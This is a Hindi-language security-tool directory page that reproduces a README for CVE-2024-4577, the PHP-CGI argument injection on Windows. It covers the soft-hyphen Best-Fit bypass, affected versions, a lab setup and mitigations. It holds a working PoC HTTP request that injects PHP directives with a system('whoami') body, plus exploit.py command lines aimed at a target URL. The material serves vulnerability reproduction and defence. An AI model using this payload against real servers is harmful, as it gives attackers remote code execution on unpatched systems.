Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-4577-phpcgi_rce_reproduction — CVE प्रजनन: cve-2024-4577-phpcgi_rce_reproduction | Kitploit
उपकरण/GitHubGitHub/razureink/cve-2024-4577-phpcgi_rce_reproduction
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubrazureink/cve-2024-4577-phpcgi_rce_reproduction

cve-2024-4577-phpcgi_rce_reproduction

CVE प्रजनन: cve-2024-4577-phpcgi_rce_reproduction

रिपॉजिटरी देखें
171 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577 - विंडोज पर PHP CGI आर्गुमेंट इंजेक्शन ("WorstFit")

अवलोकन

CVE-2024-4577 विंडोज पर PHP के CGI कार्यान्वयन में एक गंभीर रिमोट कोड निष्पादन भेद्यता है। यह मूल CVE-2012-1823 के फिक्स को बायपास करता है, विंडोज "Best-Fit" कोड पेज रूपांतरण का उपयोग करके CGI क्वेरी स्ट्रिंग के माध्यम से कमांड-लाइन आर्गुमेंट्स को तस्करी करता है।

  • CVSS स्कोर: 9.8 (गंभीर)
  • खोजकर्ता: ऑरेंज साई (DEVCORE)
  • प्रकार: OS कमांड इंजेक्शन / आर्गुमेंट इंजेक्शन
  • पैच दिनांक: 6 जून, 2024

तकनीकी विवरण

जब PHP एक CGI मॉड्यूल (php-cgi.exe) के रूप में चलता है, तो यह क्वेरी स्ट्रिंग को कमांड-लाइन आर्गुमेंट के रूप में पार्स करता है। CVE-2012-1823 के मूल फिक्स ने आर्गुमेंट इंजेक्शन को रोकने के लिए - (हाइफन, 0x2D) कैरेक्टर को ब्लॉक कर दिया था। हालांकि, कुछ कोड पेजों (जैसे चीनी, जापानी, कोरियाई) का उपयोग करने वाले विंडोज सिस्टम पर, "Best-Fit" कैरेक्टर मैपिंग सुविधा विशिष्ट यूनिकोड कैरेक्टर को उनके निकटतम ASCII समकक्षों में परिवर्तित करती है।

मुख्य बायपास सॉफ्ट-हाइफन कैरेक्टर (0xAD / U+00AD) का उपयोग करता है। जब कोई अनुरोध क्वेरी स्ट्रिंग में %AD पास करता है और सर्वर का लोकेल "Best-Fit" कोड पेज का उपयोग करता है, तो विंडोज आंतरिक रूप से को (हाइफन) में परिवर्तित करता है, जिससे हमलावर फिल्टर के बावजूद PHP आर्गुमेंट इंजेक्ट कर सकता है।

0xAD
0x2D

उदाहरण: %ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input बन जाता है -d allow_url_include=1 -d auto_prepend_file=php://input

प्रभावित संस्करण

  • PHP 8.1.* 8.1.29 से पहले
  • PHP 8.2.* 8.2.20 से पहले
  • PHP 8.3.* 8.3.8 से पहले

कॉन्फ़िगरेशन आवश्यकताएँ:

  • PHP php-cgi.exe के साथ CGI के रूप में चल रहा हो
  • Apache वेब सर्वर mod_cgi या mod_cgid के साथ कॉन्फ़िगर हो
  • विंडोज लोकेल "Best-Fit" कोड पेज (चीनी, जापानी, कोरियाई, आदि) का उपयोग करता हो

एनवायरनमेंट सेटअप (XAMPP)

  1. विंडोज के लिए एक कमजोर PHP संस्करण (जैसे 8.1.28) डाउनलोड करें।
  2. XAMPP या Apache को CGI मोड में सेटअप करें:
    root@kitploit:~
    ScriptAlias /php-cgi/ "C:/php/"
    Action application/x-httpd-php-cgi /php-cgi/php-cgi.exe
    
  3. लक्ष्य सत्यापित करें: http://localhost/php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input

उपयोग

root@kitploit:~
python exploit.py -t http://target/php-cgi/php-cgi.exe -c "whoami"
python exploit.py -t http://target/php-cgi/php-cgi.exe --phpinfo

PoC

तैयार किया गया पेलोड क्वेरी स्ट्रिंग के माध्यम से PHP कॉन्फ़िगरेशन निर्देशों को इंजेक्ट करता है:

root@kitploit:~
GET /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input
Host: target
Content-Type: application/x-www-form-urlencoded

<?php system("whoami"); ?>

शमन

  • PHP को 8.3.8+, 8.2.20+, या 8.1.29+ पर अपग्रेड करें
  • CGI मोड को अक्षम करें और इसके बजाय PHP-FPM, mod_php, या FastCGI का उपयोग करें
  • php-cgi.exe के अनुरोधों को ब्लॉक करने के लिए IIS या Apache रीराइट नियम लागू करें
  • PHP को केवल गैर-Best-Fit कोड पेजों (जैसे अंग्रेजी) वाले सिस्टम पर चलाएँ

संदर्भ

  • https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-en/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-4577
  • https://www.php.net/ChangeLog-8.php
  • https://github.com/php/php-src/commit/2ae601d8d0d5b42891c6e15a28a14d1f44855f09
टूल डाउनलोड करें